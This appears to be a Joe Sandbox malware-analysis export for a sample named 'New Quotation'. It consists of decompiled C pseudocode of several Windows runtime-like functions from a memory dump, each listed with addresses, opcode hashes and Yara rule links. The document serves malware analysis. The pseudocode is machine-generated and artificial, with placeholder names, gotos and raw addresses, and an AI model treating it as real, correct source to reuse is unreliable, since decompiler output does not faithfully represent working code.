                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d895db7
                                                                                                                                                                                          0x1d895db9
                                                                                                                                                                                          0x1d895dbd
                                                                                                                                                                                          0x1d895dc2
                                                                                                                                                                                          0x1d895dc5
                                                                                                                                                                                          0x1d895dca
                                                                                                                                                                                          0x1d895de5
                                                                                                                                                                                          0x1d895de5
                                                                                                                                                                                          0x1d895de5
                                                                                                                                                                                          0x1d895dee
                                                                                                                                                                                          0x1d895df2
                                                                                                                                                                                          0x1d895df4
                                                                                                                                                                                          0x1d895df7
                                                                                                                                                                                          0x1d895dfb
                                                                                                                                                                                          0x1d895e00
                                                                                                                                                                                          0x1d895e00
                                                                                                                                                                                          0x1d895e03
                                                                                                                                                                                          0x1d895e03
                                                                                                                                                                                          0x1d895e05
                                                                                                                                                                                          0x1d895e0b
                                                                                                                                                                                          0x1d895e0d
                                                                                                                                                                                          0x1d895e0f
                                                                                                                                                                                          0x1d895e10
                                                                                                                                                                                          0x1d895e11
                                                                                                                                                                                          0x1d895e17
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d895e17
                                                                                                                                                                                          0x1d895dcc
                                                                                                                                                                                          0x1d895dce
                                                                                                                                                                                          0x1d895dd1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d895dd8
                                                                                                                                                                                          0x1d895ddc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d895dde
                                                                                                                                                                                          0x1d895de0
                                                                                                                                                                                          0x1d895de0
                                                                                                                                                                                          0x1d895de1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d895e19
                                                                                                                                                                                          0x1d895e19
                                                                                                                                                                                          0x1d895e31
                                                                                                                                                                                          0x1d895e36
                                                                                                                                                                                          0x1d895e46
                                                                                                                                                                                          0x1d895e46
                                                                                                                                                                                          0x1d895d80
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: b3bef2a2fedcfed62c28076919f80bc5c26d11e96fab103eb0390f823043ef48
                                                                                                                                                                                          • Instruction ID: 50cd2ea60ed2edfeede1e32bee8b5b1e5a8ed8dc6bf9d107d5153bc32e668566
                                                                                                                                                                                          • Opcode Fuzzy Hash: b3bef2a2fedcfed62c28076919f80bc5c26d11e96fab103eb0390f823043ef48
                                                                                                                                                                                          • Instruction Fuzzy Hash: B431B275A00256AFD719CF68C884FAEB7B5EB84740F4141A8F545EB244D770FD00CBA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D895C38 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                          			E1D895C38(signed int __ecx, intOrPtr* __edx) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _t29;
				intOrPtr* _t30;
				intOrPtr _t40;
				void* _t44;
				signed int _t50;
				intOrPtr* _t51;
				intOrPtr _t52;

				_v20 = __edx;
				_t50 = __ecx;
				if(__edx != 0) {
					L1D7E2330(__edx, 0x1d8c433c);
					_t42 = _t50;
					_t40 = E1D895C15(_t50);
					if(_t40 != 0) {
						L15:
						E1D7E24D0(0x1d8c433c);
						 *_v20 = _t40;
						return 0;
					}
					_t44 = E1D895C15(_t42 ^ 0x00000100);
					if(_t44 != 0) {
						_v12 =  *((intOrPtr*)(_t44 + 4));
						_v8 =  *((intOrPtr*)(_t44 + 8));
						L7:
						_t51 = E1D7E5D90(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x50);
						if(_t51 != 0) {
							_t10 = _t51 + 0xc; // 0xc
							_t40 = _t10;
							_t29 = E1D887D67(_t50, _v12, _v8, _t40);
							_v16 = _t29;
							if(_t29 >= 0) {
								 *(_t51 + 8) = _t50;
								_t30 =  *0x1d8c341c; // 0x773f3418
								if( *_t30 != 0x1d8c3418) {
									0x1d8c3418 = 3;
									asm("int 0x29");
								}
								 *_t51 = 0x1d8c3418;
								 *((intOrPtr*)(_t51 + 4)) = _t30;
								 *_t30 = _t51;
								 *0x1d8c341c = _t51;
								goto L15;
							}
							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t51);
							_t52 = _v16;
							L11:
							E1D7E24D0(0x1d8c433c);
							return _t52;
						}
						_t52 = 0xc0000017;
						goto L11;
					}
					_push( &_v8);
					_push( &_v12);
					_push(_t44);
					_push(_t50 & 0xfffffeff);
					_push(0xc);
					_t52 = E1D813940();
					if(_t52 >= 0) {
						goto L7;
					}
					goto L11;
				}
				return 0xc00000f0;
			}














                                                                                                                                                                                          0x1d895c43
                                                                                                                                                                                          0x1d895c48
                                                                                                                                                                                          0x1d895c4c
                                                                                                                                                                                          0x1d895c5d
                                                                                                                                                                                          0x1d895c62
                                                                                                                                                                                          0x1d895c69
                                                                                                                                                                                          0x1d895c6d
                                                                                                                                                                                          0x1d895d2d
                                                                                                                                                                                          0x1d895d32
                                                                                                                                                                                          0x1d895d3a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d895d3c
                                                                                                                                                                                          0x1d895c7e
                                                                                                                                                                                          0x1d895c82
                                                                                                                                                                                          0x1d895ca7
                                                                                                                                                                                          0x1d895cad
                                                                                                                                                                                          0x1d895cb0
                                                                                                                                                                                          0x1d895cc2
                                                                                                                                                                                          0x1d895cc6
                                                                                                                                                                                          0x1d895cd2
                                                                                                                                                                                          0x1d895cd2
                                                                                                                                                                                          0x1d895cdb
                                                                                                                                                                                          0x1d895ce0
                                                                                                                                                                                          0x1d895ce5
                                                                                                                                                                                          0x1d895d0a
                                                                                                                                                                                          0x1d895d12
                                                                                                                                                                                          0x1d895d19
                                                                                                                                                                                          0x1d895d1d
                                                                                                                                                                                          0x1d895d1e
                                                                                                                                                                                          0x1d895d1e
                                                                                                                                                                                          0x1d895d20
                                                                                                                                                                                          0x1d895d22
                                                                                                                                                                                          0x1d895d25
                                                                                                                                                                                          0x1d895d27
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d895d27
                                                                                                                                                                                          0x1d895cf4
                                                                                                                                                                                          0x1d895cf9
                                                                                                                                                                                          0x1d895cfc
                                                                                                                                                                                          0x1d895d01
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d895d06
                                                                                                                                                                                          0x1d895cc8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d895cc8
                                                                                                                                                                                          0x1d895c87
                                                                                                                                                                                          0x1d895c8b
                                                                                                                                                                                          0x1d895c8c
                                                                                                                                                                                          0x1d895c94
                                                                                                                                                                                          0x1d895c95
                                                                                                                                                                                          0x1d895c9c
                                                                                                                                                                                          0x1d895ca0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d895ca2
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: f7d04e5906588c19c5c02ded0b95f28d66090c40f69833cfebdf5d5def3d1e31
                                                                                                                                                                                          • Instruction ID: e73b1abf0a2f0f6c6d9612e2b1a4c4173e2446b373f3c4556580e42b77f6d8c2
                                                                                                                                                                                          • Opcode Fuzzy Hash: f7d04e5906588c19c5c02ded0b95f28d66090c40f69833cfebdf5d5def3d1e31
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A31D175604649EBD7169FACC880BAEB7A4AF84754F0140B9E545EB350DA70FD028BA2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D80188E Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                          			E1D80188E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x1d8c5c90; // 0x11
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x1d8c5c90 = 8;
					 *0x1d8c5c94 = 0x1d8c5c88;
					 *0x1d8c5c98 = 1;
					L6:
					_t2 = _t52 + 1; // 0x12
					E1D801B10(0x1d8c5c90, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = E1D8019C0(__edx, __ecx, __ecx, _t52, 0x1d8c5c90, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x1d8c5c90; // 0x11
					_t3 = _t37 + 0x27; // 0x38
					__eflags = _t3 >> 5 -  *0x1d8c5c98; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x1d8c5d78; // 0x0
						_t4 = _t52 + 0x27; // 0x38
						_v8 = _t4 >> 5;
						_t50 = E1D7E5D90(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x1d8c5c98 = _v8;
						_t8 = _t52 + 7; // 0x18
						E1D8188C0(_t50,  *0x1d8c5c94, _t8 >> 3);
						_t28 =  *0x1d8c5c94; // 0x773f5c88
						__eflags = _t28 - 0x1d8c5c88;
						if(_t28 != 0x1d8c5c88) {
							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x19
						 *0x1d8c5c94 = _t50;
						_t48 = _v12;
						 *0x1d8c5c90 = _t9;
						goto L6;
					}
					 *0x1d8c5c90 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                                                                                                                                                          0x1d801893
                                                                                                                                                                                          0x1d801894
                                                                                                                                                                                          0x1d801897
                                                                                                                                                                                          0x1d80189d
                                                                                                                                                                                          0x1d8018a0
                                                                                                                                                                                          0x1d8018a2
                                                                                                                                                                                          0x1d8018a7
                                                                                                                                                                                          0x1d8018c8
                                                                                                                                                                                          0x1d8018d2
                                                                                                                                                                                          0x1d8018dc
                                                                                                                                                                                          0x1d8018e6
                                                                                                                                                                                          0x1d8018e8
                                                                                                                                                                                          0x1d8018f1
                                                                                                                                                                                          0x1d801909
                                                                                                                                                                                          0x1d80190e
                                                                                                                                                                                          0x1d801910
                                                                                                                                                                                          0x1d8018c1
                                                                                                                                                                                          0x1d8018c1
                                                                                                                                                                                          0x1d8018c3
                                                                                                                                                                                          0x1d8018c7
                                                                                                                                                                                          0x1d8018c7
                                                                                                                                                                                          0x1d8018b2
                                                                                                                                                                                          0x1d8018ba
                                                                                                                                                                                          0x1d801915
                                                                                                                                                                                          0x1d80191b
                                                                                                                                                                                          0x1d801921
                                                                                                                                                                                          0x1d801927
                                                                                                                                                                                          0x1d801934
                                                                                                                                                                                          0x1d80193a
                                                                                                                                                                                          0x1d801948
                                                                                                                                                                                          0x1d80195e
                                                                                                                                                                                          0x1d801960
                                                                                                                                                                                          0x1d801962
                                                                                                                                                                                          0x1d841a15
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d841a15
                                                                                                                                                                                          0x1d80196b
                                                                                                                                                                                          0x1d801970
                                                                                                                                                                                          0x1d80197e
                                                                                                                                                                                          0x1d801983
                                                                                                                                                                                          0x1d80198b
                                                                                                                                                                                          0x1d801990
                                                                                                                                                                                          0x1d8019b4
                                                                                                                                                                                          0x1d8019b4
                                                                                                                                                                                          0x1d801992
                                                                                                                                                                                          0x1d801995
                                                                                                                                                                                          0x1d80199b
                                                                                                                                                                                          0x1d80199e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80199e
                                                                                                                                                                                          0x1d80192c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80192c
                                                                                                                                                                                          0x1d8018bc
                                                                                                                                                                                          0x1d8018be
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 5e3b6a1d2c16d38d49988abbfd3f9691f8d39c01e5d75d3a85019b12137bede6
                                                                                                                                                                                          • Instruction ID: 903725b04537d19349055c57ed95ed7c02a382b3b292d60c0d64c6f50909164b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e3b6a1d2c16d38d49988abbfd3f9691f8d39c01e5d75d3a85019b12137bede6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8531A9B1604214EFDB11CF18CCC1BA97BF9FB897A0F51469AE108DB240EB75B941CB62
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7FAE89 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                          			E1D7FAE89(intOrPtr __ecx, signed int* __edx) {
				signed int _v8;
				char _v716;
				intOrPtr* _v720;
				short _v722;
				char _v724;
				intOrPtr _v728;
				signed int* _v732;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t27;
				intOrPtr _t32;
				void* _t35;
				intOrPtr _t39;
				void* _t42;
				void* _t46;
				intOrPtr* _t48;
				signed int* _t49;
				intOrPtr* _t50;
				signed int _t52;
				signed int _t53;

				_t47 = __edx;
				_t43 = __ecx;
				_v8 =  *0x1d8cb370 ^ _t53;
				_v728 = __ecx;
				_v732 = __edx;
				_t49 = 0;
				_t48 = 0x1d7a1200;
				 *__edx = 0;
				_v720 =  &_v716;
				_v722 = 0x2be;
				_t27 = E1D7FB130(__ecx, 0, 0x1d7a1200,  &_v724);
				if(_t27 == 0xc0000023) {
					_v722 = _v724 + 2;
					_t32 = E1D7E5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v724 + 0x00000002 & 0x0000ffff);
					_v720 = _t32;
					goto L3;
				} else {
					if(_t27 >= 0) {
						_t32 = _v720;
						L3:
						if(_t32 == 0) {
							_t27 = 0xc00000bb;
						} else {
							_t35 = E1D7FB130(_t43, _t49, _t48,  &_v724);
							_t48 = _v720;
							_t42 = _t35;
							if(_t42 >= 0) {
								_t50 = _t48;
								_t47 = 0;
								_t46 = _t50 + 2;
								do {
									_t39 =  *_t50;
									_t50 = _t50 + 2;
								} while (_t39 != 0);
								_t52 = _t50 - _t46 >> 1;
								if(E1D817AD0(_v728, _t48, _t52) != 0) {
									_t42 = 0xc00000bb;
								} else {
									 *_v732 = _t52;
								}
								_t49 = 0;
							}
							if(_t48 !=  &_v716) {
								E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t49, _t48);
							}
							_t27 = _t42;
						}
					}
				}
				return E1D814B50(_t27, _t42, _v8 ^ _t53, _t47, _t48, _t49);
			}
























                                                                                                                                                                                          0x1d7fae89
                                                                                                                                                                                          0x1d7fae89
                                                                                                                                                                                          0x1d7fae9b
                                                                                                                                                                                          0x1d7faea2
                                                                                                                                                                                          0x1d7faea8
                                                                                                                                                                                          0x1d7faeae
                                                                                                                                                                                          0x1d7faeb1
                                                                                                                                                                                          0x1d7faeb6
                                                                                                                                                                                          0x1d7faebe
                                                                                                                                                                                          0x1d7faec9
                                                                                                                                                                                          0x1d7faed9
                                                                                                                                                                                          0x1d7faee3
                                                                                                                                                                                          0x1d83e224
                                                                                                                                                                                          0x1d83e23a
                                                                                                                                                                                          0x1d83e23f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7faee9
                                                                                                                                                                                          0x1d7faeeb
                                                                                                                                                                                          0x1d7faeed
                                                                                                                                                                                          0x1d7faef3
                                                                                                                                                                                          0x1d7faef5
                                                                                                                                                                                          0x1d7faf6b
                                                                                                                                                                                          0x1d7faef7
                                                                                                                                                                                          0x1d7faf00
                                                                                                                                                                                          0x1d7faf05
                                                                                                                                                                                          0x1d7faf0b
                                                                                                                                                                                          0x1d7faf0f
                                                                                                                                                                                          0x1d7faf11
                                                                                                                                                                                          0x1d7faf13
                                                                                                                                                                                          0x1d7faf15
                                                                                                                                                                                          0x1d7faf18
                                                                                                                                                                                          0x1d7faf18
                                                                                                                                                                                          0x1d7faf1b
                                                                                                                                                                                          0x1d7faf1e
                                                                                                                                                                                          0x1d7faf25
                                                                                                                                                                                          0x1d7faf39
                                                                                                                                                                                          0x1d7faf64
                                                                                                                                                                                          0x1d7faf3b
                                                                                                                                                                                          0x1d7faf41
                                                                                                                                                                                          0x1d7faf41
                                                                                                                                                                                          0x1d7faf43
                                                                                                                                                                                          0x1d7faf43
                                                                                                                                                                                          0x1d7faf4d
                                                                                                                                                                                          0x1d83e255
                                                                                                                                                                                          0x1d83e255
                                                                                                                                                                                          0x1d7faf53
                                                                                                                                                                                          0x1d7faf53
                                                                                                                                                                                          0x1d7faef5
                                                                                                                                                                                          0x1d7faeeb
                                                                                                                                                                                          0x1d7faf63

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 5f0fc399bfbbf529bb30a8356e4b28e1bd8eb0520c41e8b6049ed2a5de3bb9ed
                                                                                                                                                                                          • Instruction ID: 5f0cf548eb0dfdf4f0e2be6d2fa12cbfacbbbb27e126d4ba3c2e77527f3f4e2b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f0fc399bfbbf529bb30a8356e4b28e1bd8eb0520c41e8b6049ed2a5de3bb9ed
                                                                                                                                                                                          • Instruction Fuzzy Hash: 87316F75A012299BDB319E69CC48FAFB7B8FF44650F0641AAF818E7350D630DE44CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D80BC6E Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                          			E1D80BC6E(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				intOrPtr _v28;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x1d8cb370 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1d8c5d78; // 0x0
					_t53 = E1D7E5D90(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E1D814B50(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E1D8188C0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_push("true");
						_pop(_t51);
						if(E1D7F1C7D(_t53, _t51, _t58) != 0) {
							_t28 = E1D7CE0E0(0x1d7b1298, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E1D801280(_t42, _v32, _v28, 0x1d7b1238, 1,  &_v24);
								_t28 = E1D7F99E0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                                                                                                                                                          0x1d80bc7d
                                                                                                                                                                                          0x1d80bc81
                                                                                                                                                                                          0x1d80bc85
                                                                                                                                                                                          0x1d80bc88
                                                                                                                                                                                          0x1d80bc8f
                                                                                                                                                                                          0x1d80bc94
                                                                                                                                                                                          0x1d84786f
                                                                                                                                                                                          0x1d84786f
                                                                                                                                                                                          0x1d847889
                                                                                                                                                                                          0x1d84788b
                                                                                                                                                                                          0x1d84788d
                                                                                                                                                                                          0x1d80bcbc
                                                                                                                                                                                          0x1d80bcca
                                                                                                                                                                                          0x1d847893
                                                                                                                                                                                          0x1d84789a
                                                                                                                                                                                          0x1d8478a9
                                                                                                                                                                                          0x1d80bcaa
                                                                                                                                                                                          0x1d80bcaa
                                                                                                                                                                                          0x1d80bcac
                                                                                                                                                                                          0x1d80bcb6
                                                                                                                                                                                          0x1d8478bf
                                                                                                                                                                                          0x1d8478c4
                                                                                                                                                                                          0x1d8478c6
                                                                                                                                                                                          0x1d8478cd
                                                                                                                                                                                          0x1d8478cd
                                                                                                                                                                                          0x1d8478d0
                                                                                                                                                                                          0x1d8478d3
                                                                                                                                                                                          0x1d8478e4
                                                                                                                                                                                          0x1d8478ea
                                                                                                                                                                                          0x1d8478ed
                                                                                                                                                                                          0x1d8478f8
                                                                                                                                                                                          0x1d8478f8
                                                                                                                                                                                          0x1d8478fd
                                                                                                                                                                                          0x1d8478ff
                                                                                                                                                                                          0x1d847912
                                                                                                                                                                                          0x1d847912
                                                                                                                                                                                          0x1d8478ff
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80bcb6
                                                                                                                                                                                          0x1d84788d
                                                                                                                                                                                          0x1d80bc9a
                                                                                                                                                                                          0x1d80bc9e
                                                                                                                                                                                          0x1d80bca0
                                                                                                                                                                                          0x1d80bca4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: ee81d160e6a2a83bb7be5d5c5e3c35c1067cd88e401e3676ebd3d318de7a114c
                                                                                                                                                                                          • Instruction ID: 2ce320ff17c11ea650a1a10a2e631cb600ce5ceca0359be261631c1da8981a2e
                                                                                                                                                                                          • Opcode Fuzzy Hash: ee81d160e6a2a83bb7be5d5c5e3c35c1067cd88e401e3676ebd3d318de7a114c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2931F271A00119EACB019F69CC81ABFB7B8FF44710F114069FA01EB250E774E951C7A2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7CDDB0 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                                                                          			E1D7CDDB0(intOrPtr* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				intOrPtr* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x1d8cb370 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E1D7D0FB0(__ecx, __edx, 0x1d8c666c, 0x1d7cdd30, 0, 0);
					if( *0x1d8c32f0 > 5 && E1D7CDE1A(0x1d8c32f0, 0, 0x2000) != 0) {
						_v104 = 0;
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(__ecx + 0x28));
						_v84 =  *(__ecx + 0x24) & 0x0000ffff;
						_v156 =  *((intOrPtr*)(__ecx + 0x44));
						_v76 =  &_v156;
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v60 =  &_v144;
						_t70 = 8;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v44 =  &_v148;
						_push("true");
						_pop(_t67);
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v28 =  &_v164;
						_v68 = _t70;
						_v52 = 0x1d8c32f0;
						_v36 = 0x1d8c32f0;
						_v20 = _t70;
						_t69 = 0x1d7b0d5a;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v152 = 0;
						_v72 = 0;
						_v64 = 0;
						_v56 = 0;
						_v48 = 0;
						_v40 = 0;
						_v32 = 0;
						_v160 = 0;
						_v24 = 0;
						_v16 = 0;
						_t48 = E1D85105C(0x1d8c32f0, 0x1d7b0d5a, _t67, 0x1d8c32f0, _t70,  &_v140);
					}
				}
				return E1D814B50(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                                                                                                                                                          0x1d7cddb0
                                                                                                                                                                                          0x1d7cddc2
                                                                                                                                                                                          0x1d7cddc5
                                                                                                                                                                                          0x1d7cddcf
                                                                                                                                                                                          0x1d7cddd2
                                                                                                                                                                                          0x1d7cddd7
                                                                                                                                                                                          0x1d7cdde5
                                                                                                                                                                                          0x1d7cddf1
                                                                                                                                                                                          0x1d82d5b7
                                                                                                                                                                                          0x1d82d5ba
                                                                                                                                                                                          0x1d82d5c0
